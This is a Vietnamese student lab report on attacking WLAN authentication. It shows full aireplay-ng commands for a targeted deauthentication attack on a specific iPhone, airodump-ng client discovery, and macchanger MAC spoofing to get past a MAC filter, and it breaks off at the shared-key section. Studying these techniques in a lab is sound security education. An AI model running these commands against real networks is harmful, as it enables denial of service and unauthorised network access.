Lab 03 : VƯỢT QUA XÁC THỰC MẠNG WLAN
Nhóm thực hành số 7 - Tel-Bug:
- Tống Võ Anh Thuận - 21522652
- Nguyễn Lê Tiến Phát - 21522446
C.1 Khám phá SSIDs ẩn
SSID bị ẩn
Yêu cầu 1. Theo cách trên có thể gửi broadcast deauthentication đến tất cả
các
client. Tìm hiểu công cụ aireplay-ng để deauthentication attack có chọn lọc
client.
Lấy địa chỉ MAC của AP
Địa chỉ MAC: 64:66:b3:c1:92:2e
Lấy địa chỉ MAC của client muốn tấn công
Điện thoại Iphone kết nối vào mạng “WNS-Ses3”
Lấy được địa chỉ MAC của iphone vừa kết nối
Địa chỉ MAC: fc:fc:48:b1:ab:a0
Tiến hành tấn công có chọn lọc vào client trên sử dụng lệnh:
“aireplay-ng -0 10 -a 64:66:b3:c1:92:2e -c fc:fc:48:b1:ab:a0 wlan0mon”
C.2 MAC filters
Yêu cầu 2: Thực hiện mục C.2
Vết gói Authentication
Dùng lệnh “airodump-ng -c 11 -a --bssid 64:66:b3:c1:92:2e wlan0mon”
Ta tìm ra MAC của Client đang kết nối tới AP
“macchanger –m fc:fc:48:b1:ab:a0 wlan0mon “
Đổi địa chỉ MAC thành công nhờ câu lệnh trên và kết nối được tới AP.
C.3 Shared Key Authentication
Yêu cầu 3: Xác định gói đầu tiên, yêu cầu xác thực được gửi bởi aireplay-ng
đến AP.
Kiểm tra kênh mạng